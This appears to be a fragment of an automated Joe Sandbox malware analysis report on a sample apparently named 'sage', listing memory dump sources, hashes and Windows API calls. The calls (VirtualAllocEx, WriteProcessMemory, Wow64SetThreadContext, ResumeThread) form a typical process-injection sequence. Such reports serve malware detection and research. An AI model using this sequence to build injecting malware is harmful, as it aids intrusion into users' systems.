                                                                                                                                                • Instruction ID: 37babd488d47cd2650d35513dcd5896d242f598089c54407e5d483142e25be6b
                                                                                                                                                • Opcode Fuzzy Hash: 5b184e7654fe65496c87b8904a745f748d1929d86839aa0d2a914e7a04165ce9
                                                                                                                                                • Instruction Fuzzy Hash: EBA22F70A00219DFDB14DF69C894BAEBBB2BF89304F2581A9E805EB365DF34D941CB51
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: d49526fa392c5ff1490bf5d518ad0629872ff45a2e33fe0145dc8c146ae654e6
                                                                                                                                                • Instruction ID: 517f634d0d2758efe0d2e8232b452d576f54a2a02b8343e859d9a01e12787fa3
                                                                                                                                                • Opcode Fuzzy Hash: d49526fa392c5ff1490bf5d518ad0629872ff45a2e33fe0145dc8c146ae654e6
                                                                                                                                                • Instruction Fuzzy Hash: A802B274E002588FDB64DFA9C980B9DFBB2BF89300F1481A9D449AB355DB349E85CF61
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 6afa8fcdf4d7093925eaf061707801a975684d288c8352474cb3436b84b6e2b0
                                                                                                                                                • Instruction ID: b7c48d8a1b54f35032702023105e7cbface8f43f4a9708256faec85dc4acede2
                                                                                                                                                • Opcode Fuzzy Hash: 6afa8fcdf4d7093925eaf061707801a975684d288c8352474cb3436b84b6e2b0
                                                                                                                                                • Instruction Fuzzy Hash: A4B18270704356CBEF681B36944473A7AFBAFC6F05F288429D886C6295CFB4C845CB66
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: b65b908107cd9bff21b8028f5bdb18277bd1660d0d314e1588083bb25f8e06f6
                                                                                                                                                • Instruction ID: 491f8bc9b20874fcb250397d08e34f7fd697135e1c43ccfcb82a877a3b63b7f6
                                                                                                                                                • Opcode Fuzzy Hash: b65b908107cd9bff21b8028f5bdb18277bd1660d0d314e1588083bb25f8e06f6
                                                                                                                                                • Instruction Fuzzy Hash: 5751C075E00218CFDB18CFA6C598ADDBBB2BF89305F24846AE405AB364DB749946CF10

                                                                                                                                                Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
Similarity
• API ID:
• String ID: h3o
• API String ID: 0-2140973757
• Opcode ID: b0938cc9268b9fd8000ee222005567df8e8448e00527d6c4568873744b7cb291
• Instruction ID: 327c4a392dd4f30787976edf21e31afb33b5693b6d70d9d290d10db3f50148b7
• Opcode Fuzzy Hash: b0938cc9268b9fd8000ee222005567df8e8448e00527d6c4568873744b7cb291
• Instruction Fuzzy Hash: 7AA23774E11219CFCB28EFB8D98979DBBB1BB88300F5089A9D449E3250DE389D85CF51

APIs
• CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 06F6324B
Memory Dump Source
• Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
Similarity
• API ID: CreateProcessUser
• String ID:
• API String ID: 2217836671-0
• Opcode ID: a19e200056b6e0f8a764370a09b26ca5d0ae638c2b98e26bb2d06698b14bc4e9
• Instruction ID: 22ee784a6f0f7c6b1de40280d41616c1ce220550a8b480f737381e275a14c31b
• Opcode Fuzzy Hash: a19e200056b6e0f8a764370a09b26ca5d0ae638c2b98e26bb2d06698b14bc4e9
• Instruction Fuzzy Hash: 4C511771D00219DFDB24CF9AC840BDDBBB5BF48314F0485AAE819B7250DB759A89CFA0

APIs
• VirtualProtect.KERNEL32(?,?,?,?), ref: 06F1341B
Memory Dump Source
• Source File: 0000000E.00000002.6019920570.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6f10000_sage.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 2d4201fb4b15206bda8c708626420dfb9af807d6bbbc0e97636721bd22517271
• Instruction ID: 7e4114aab19ced5a700c9082fea6bb3ce52993124c90943c013730d1ab54eb41
• Opcode Fuzzy Hash: 2d4201fb4b15206bda8c708626420dfb9af807d6bbbc0e97636721bd22517271
• Instruction Fuzzy Hash: 0C410076802645AFCB10CFB5CC49ADBBFBEAB09340F24505AF855ABE01D7788645CBB1

APIs
• VirtualProtect.KERNEL32(?,?,?,?), ref: 06F1341B
Memory Dump Source
• Source File: 0000000E.00000002.6019920570.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6f10000_sage.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: e8ad2a30033a46a4440a2dc40b88b4403acc01e5f12804bb34c184264ff09649
• Instruction ID: 1e95f19d9e17b91e947b2b98756f2c51080253951f6b0622203dc3f0aee0ccee
• Opcode Fuzzy Hash: e8ad2a30033a46a4440a2dc40b88b4403acc01e5f12804bb34c184264ff09649
• Instruction Fuzzy Hash: 1631D075805249AFCB11CFB9CC49ADBBFF9AF09300F24905AF844ABA01D7385644CBB1

Strings
Memory Dump Source
• Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
Similarity
• API ID:
• String ID: z6p^
• API String ID: 0-2798388163
• Opcode ID: 191a753d135770bd20cdec5ca297a79af017553f6a77efa681d6a26896e68a58
• Instruction ID: 3c27ffbd6718101c808da677804f663333107dcb0fc02369deb2013ee3817171
• Opcode Fuzzy Hash: 191a753d135770bd20cdec5ca297a79af017553f6a77efa681d6a26896e68a58
• Instruction Fuzzy Hash: B2B129303052028FDB159B28EEA873977A6AFC5644F1944AAE516CF3A2EF2DCC41CB55

APIs
• WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06F65758
Memory Dump Source
• Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 28733e0a7e8e3d001b29abe20f418a772070c932c2ae24c0cb9572091804586c
• Instruction ID: a9fa25111d8c59e3390d659547a892ddeb486af5d28ed57bf816d5484dd47f10
• Opcode Fuzzy Hash: 28733e0a7e8e3d001b29abe20f418a772070c932c2ae24c0cb9572091804586c
• Instruction Fuzzy Hash: 81212875D003499FDB10CFAAC9817DEBBF1FF48314F14842AE819A7241D7789955DBA0

APIs
• WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06F65758
Memory Dump Source
• Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 6117dab7c14a06315c1ecddbd3d2dc327be3abe8faf0be87ba1c181f15a51ea9
• Instruction ID: 55fe5c534d00812ab5f6d68d778faf1f58e30fd72305e98aab0749ea172d3d06
• Opcode Fuzzy Hash: 6117dab7c14a06315c1ecddbd3d2dc327be3abe8faf0be87ba1c181f15a51ea9
• Instruction Fuzzy Hash: CF212275D003499FCB10CFAAC984BEEBBF5FF48314F10882AE919A7240D7789945CBA0

APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F65E86
Memory Dump Source
• Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: ccb06e37298374bb296305f646a4d8075c92de110d8145c27cf3e94bb68df744
• Instruction ID: d7aedadaa98cf1bdf4082da543ea0ca259aa37c2acfb04bd1d27efab7f362179
• Opcode Fuzzy Hash: ccb06e37298374bb296305f646a4d8075c92de110d8145c27cf3e94bb68df744
• Instruction Fuzzy Hash: A9210475D003098FDB10DFAAC8857AEBBF4AF48314F54842AE819B7241D778A945CFA0

APIs
• Wow64GetThreadContext.KERNEL32(?,00000000), ref: 06F64D1E
Memory Dump Source
• Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: d8fb3b81d9b7c0077b2b6bc5d13b89ec2610270079f61f386092143b7fa2fc8c
• Instruction ID: c40cd25439c6c4521c6b6b65bb47a6bc5fc662f760a574eef19cb020fb657901
• Opcode Fuzzy Hash: d8fb3b81d9b7c0077b2b6bc5d13b89ec2610270079f61f386092143b7fa2fc8c
• Instruction Fuzzy Hash: 14210475D002098FDB50DFAAC8857AEBBF5AF48314F14842AE85AA7340D7789945CFA4

APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F65E86
Memory Dump Source
• Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 7443a46594903d512f74f6c5397d13cb43a60c56609fc0e8975813b0f80d776c
• Instruction ID: 34168a421b92addac2dd40e2982550a01259f3638012f0989c4afc1673ebbf84
• Opcode Fuzzy Hash: 7443a46594903d512f74f6c5397d13cb43a60c56609fc0e8975813b0f80d776c
• Instruction Fuzzy Hash: 7C213575D003098FDB10DFAAC4857EEBBF1AF88314F14842AE819B7241CB789945CFA0

APIs
• Wow64GetThreadContext.KERNEL32(?,00000000), ref: 06F64D1E
Memory Dump Source
• Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 8819b407aa430addf21758d51275eadd3923f674a0de0182e423889152259001
• Instruction ID: 9dbc75a53eaf83a326d0afdb109348efc331355b7f478bca76635cbf069734c2
• Opcode Fuzzy Hash: 8819b407aa430addf21758d51275eadd3923f674a0de0182e423889152259001
• Instruction Fuzzy Hash: DC213475D003498FDB10DFAAC4857EEBBF1AF48314F14842EE85AA7241D7789A49CFA0

APIs
• VirtualProtectEx.KERNEL32(?,?,?,?,?), ref: 06F65BDF
Memory Dump Source
• Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: cf68207fe473064276b6ac570f50c1b5023ac9d262e24fa4d3aa94d3e9b899f8
• Instruction ID: f0ca1b0d2ef4a6943eef7b7b5a421554d8592352a522d662858cbb15c5ddcf2c
• Opcode Fuzzy Hash: cf68207fe473064276b6ac570f50c1b5023ac9d262e24fa4d3aa94d3e9b899f8
• Instruction Fuzzy Hash: 83212776D002499FDB10DFAAC985BEEBBF5BF48324F14842AE419B7240D7389945DFA0

                                                                                                                                                APIs
                                                                                                                                                • VirtualProtectEx.KERNEL32(?,?,?,?,?), ref: 06F65BDF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                • Opcode ID: 6b087037a44c36613bd6e926a346d280cbb1f08ebcc11c5e02881480ba43ee2f
                                                                                                                                                • Instruction ID: 5e97945a6a8c368d06cedcb6e715b252c65c740b8f9b026ae78008d16b6c62cd
                                                                                                                                                • Opcode Fuzzy Hash: 6b087037a44c36613bd6e926a346d280cbb1f08ebcc11c5e02881480ba43ee2f
                                                                                                                                                • Instruction Fuzzy Hash: D6211375C002099FDB10DFAAC884AEEBBF5AF48324F54842AE419A7240DB789945CFA1
                                                                                                                                                APIs
                                                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 06C07048
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6018498161.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6c00000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                • Opcode ID: 801b99c828b2376191771c57372c0f56d0f2b44b327fdfb2c7ed27a6902e2dd9
                                                                                                                                                • Instruction ID: 76777664a18d10b89f160324fdb8c8714ab7c3e6ca4355b2d724512fb5b698a2
                                                                                                                                                • Opcode Fuzzy Hash: 801b99c828b2376191771c57372c0f56d0f2b44b327fdfb2c7ed27a6902e2dd9
                                                                                                                                                • Instruction Fuzzy Hash: 191136B1C006599BCB14CF9AC444BDEFBB4EF48324F14822AD818B7340D339AA45CFA1
                                                                                                                                                APIs
                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 06F1BACB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6019920570.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f10000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                • Opcode ID: d0cc4df20bef6561b1037b61d12f6501e94120c6511e381e7642e06a4e35b374
                                                                                                                                                • Instruction ID: d315e1b7388d2736a1ad02110bf78630fd5fd82da4c7506318a4377937363676
                                                                                                                                                • Opcode Fuzzy Hash: d0cc4df20bef6561b1037b61d12f6501e94120c6511e381e7642e06a4e35b374
                                                                                                                                                • Instruction Fuzzy Hash: 9921D6759006499FCB10DF9AC884BDEFBF4FF48310F14842AE858A7240D378A545CFA1
                                                                                                                                                APIs
                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 06F1341B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6019920570.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f10000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                • Opcode ID: b96e4b860d9cf93c5308e3c08214366db23e9855814df2ad67dc85275a29573f
                                                                                                                                                • Instruction ID: 599924e06bdc2c04cc91f9e7565111b99bd80fb4cf1c239620fc8a0810d9caf8
                                                                                                                                                • Opcode Fuzzy Hash: b96e4b860d9cf93c5308e3c08214366db23e9855814df2ad67dc85275a29573f
                                                                                                                                                • Instruction Fuzzy Hash: FF21D6B59006499FCB10DF9AC884BDEFBF4FB48310F10842AE458A7240D379A545CFA1
                                                                                                                                                APIs
                                                                                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06F653F6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 56f8f0759d89993a370311c576aa002928191cb9370f1c5ae47a95742fde2568
                                                                                                                                                • Instruction ID: 0913656f205239bcff542086a85020de73c6101100fc67b8d98a1f350df22c6e
                                                                                                                                                • Opcode Fuzzy Hash: 56f8f0759d89993a370311c576aa002928191cb9370f1c5ae47a95742fde2568
                                                                                                                                                • Instruction Fuzzy Hash: 591129759002499FCB10DFAAC844ADFFFF5AF48314F24881AE415B7250C7799955CFA0
                                                                                                                                                APIs
                                                                                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06F653F6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 83952ad338bb449df138c13d3bb3af3b89c849140f15adeaeab52b1fa6b8e4a7
                                                                                                                                                • Instruction ID: d53f616882bceb1d0a0905d4acc4d693ee6e05de13122fbefdaa8d23ad08b3df
                                                                                                                                                • Opcode Fuzzy Hash: 83952ad338bb449df138c13d3bb3af3b89c849140f15adeaeab52b1fa6b8e4a7
                                                                                                                                                • Instruction Fuzzy Hash: 5A1126758002499FCB10DFAAC845ADFFFF5AF48314F24881AE415B7240C7799955CFA0
                                                                                                                                                APIs
                                                                                                                                                • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,8B550510), ref: 06F660D2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                • Opcode ID: b4de732d3ae1493fbe8786b3a57184236a8d2dca4210d43bf36f8b36caf1b9b3
                                                                                                                                                • Instruction ID: ac6bf47a8ca9c181f40b17359781c754c10b64401eae48ad80115b0419b8e0bd
                                                                                                                                                • Opcode Fuzzy Hash: b4de732d3ae1493fbe8786b3a57184236a8d2dca4210d43bf36f8b36caf1b9b3
                                                                                                                                                • Instruction Fuzzy Hash: 1A115875D002489FDB20DFAAD8847EEFFF5AF88314F24881AD41AA7340C7399945CBA0
                                                                                                                                                APIs
                                                                                                                                                • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,8B550510), ref: 06F660D2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                • Opcode ID: d9844b5031a57cb84cfec06bea6d8ed1cf0567ee68eb67977b499ecd419deb21
                                                                                                                                                • Instruction ID: c7a193ed0e6ff9d5747d145e056e74cbd1e1f0aae080c326947a794eb070b640
                                                                                                                                                • Opcode Fuzzy Hash: d9844b5031a57cb84cfec06bea6d8ed1cf0567ee68eb67977b499ecd419deb21
                                                                                                                                                • Instruction Fuzzy Hash: 5A112875D002489BDB10DFAAC84479EFBF5AF88314F24841AD419A7340C779A945CBA1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 8
                                                                                                                                                • API String ID: 0-3897458245
                                                                                                                                                • Opcode ID: 77063990177cba57c13e7bc85b8671e2c81ee8c2b5e47d7d3fc95c517cae22c4
                                                                                                                                                • Instruction ID: 950aef30501464efe8b1a47a9934611520c78075879625aae8dfb726bcc92a23
                                                                                                                                                • Opcode Fuzzy Hash: 77063990177cba57c13e7bc85b8671e2c81ee8c2b5e47d7d3fc95c517cae22c4
                                                                                                                                                • Instruction Fuzzy Hash: 09317E31704249EFCB159FA4D894AAE7BA2FBC8354F044028F90A97394CF75DDA1CBA5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 8
                                                                                                                                                • API String ID: 0-3897458245
                                                                                                                                                • Opcode ID: eb2fd0cbd0ed24a48082cc4aa0035162c5bb9fd37085e2051d55edecd42ada61
                                                                                                                                                • Instruction ID: 801c956b7edf638f7c9449094d571269e929638e8c124510f8da46d9d340371e
                                                                                                                                                • Opcode Fuzzy Hash: eb2fd0cbd0ed24a48082cc4aa0035162c5bb9fd37085e2051d55edecd42ada61
                                                                                                                                                • Instruction Fuzzy Hash: BC21BC39704611CFD7299B79D8A4B6ABBA2EFC97617144179FD0ACB350CF20DC428BA0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 8
                                                                                                                                                • API String ID: 0-3897458245
                                                                                                                                                • Opcode ID: d957ba155b64ef31cdeda63680a9e6b1da9086e8060e101be057abcdcbd7ebd5
                                                                                                                                                • Instruction ID: 78e32823b9d6090d5d40c5ebf8673813997c62547c73dd8e27ac017bd9b9340a
                                                                                                                                                • Opcode Fuzzy Hash: d957ba155b64ef31cdeda63680a9e6b1da9086e8060e101be057abcdcbd7ebd5
                                                                                                                                                • Instruction Fuzzy Hash: 2E21A4303042918FDB25177A8CE4B7DBAAAAFC565CB18407ADA43CB3A1DF25C843D791
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 8
                                                                                                                                                • API String ID: 0-3897458245
                                                                                                                                                • Opcode ID: 743ad26f024a2018e533e932d33197fa3bb418de15bc98d98f55dda0e2c92286
                                                                                                                                                • Instruction ID: de4893ff6627466bb652638fe08be5b54c9dda8769c5f5dd417f862376eb9ab3
                                                                                                                                                • Opcode Fuzzy Hash: 743ad26f024a2018e533e932d33197fa3bb418de15bc98d98f55dda0e2c92286
                                                                                                                                                • Instruction Fuzzy Hash: F72130303042918BDB255B6A8CE4B7AB69B9FC465CF144039DA07CB794DF65CC429291
Memory Dump Source
• Source File: 0000000E.00000002.6021000436.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_70d0000_sage.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 2d0cfe8e52e1a550300eeb8c7ba346d35b4f6061da9e937985fbcc9161416807
                                                                                                                                                • Instruction ID: 526c01782c4503d048ce20cd77f46e2c4c2ecbb716b695de8e8d779f1faf943b
                                                                                                                                                • Opcode Fuzzy Hash: 2d0cfe8e52e1a550300eeb8c7ba346d35b4f6061da9e937985fbcc9161416807
                                                                                                                                                • Instruction Fuzzy Hash: 85411234A012488FC705ABB89969B5E7FB3EFC5301F1884A9D446DB395DE34CD0A87A1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c72893b7153c7233830ef86459d7cfb301436d3ecf75e20f48f5d996c33c2d96
                                                                                                                                                • Instruction ID: 75826c19bfaac59ff024f46524142892f935ca9f5f5253f19d5451fee3c1e2ea
                                                                                                                                                • Opcode Fuzzy Hash: c72893b7153c7233830ef86459d7cfb301436d3ecf75e20f48f5d996c33c2d96
                                                                                                                                                • Instruction Fuzzy Hash: 21B1E675A00658CFCB14CFA9C984A9DBBF2FF8D314B168095E459AB362CB35EC41CB64
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c9a101a327f6dbd520cb56d22b460ca44551c1d995b0ad84658d4061c1cdd0eb
                                                                                                                                                • Instruction ID: e099a09f9e2ea8f5f8b7e545f1e31bdb84d89f979a134ad8ba3fdae7c2f72458
                                                                                                                                                • Opcode Fuzzy Hash: c9a101a327f6dbd520cb56d22b460ca44551c1d995b0ad84658d4061c1cdd0eb
                                                                                                                                                • Instruction Fuzzy Hash: B861BC30704201CFDB159B7988A4B7ABBA2AFC8710F148569F906CB395DF78CC42CBA1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: ec1d4bf7bd0d4708dffddffeaa356bf7dffaad71eee3972c93746b024d7e0834
                                                                                                                                                • Instruction ID: b9795edd5415c0661b1721b6db0eab5cd2382a5d7622db3877548352e7fc9de8
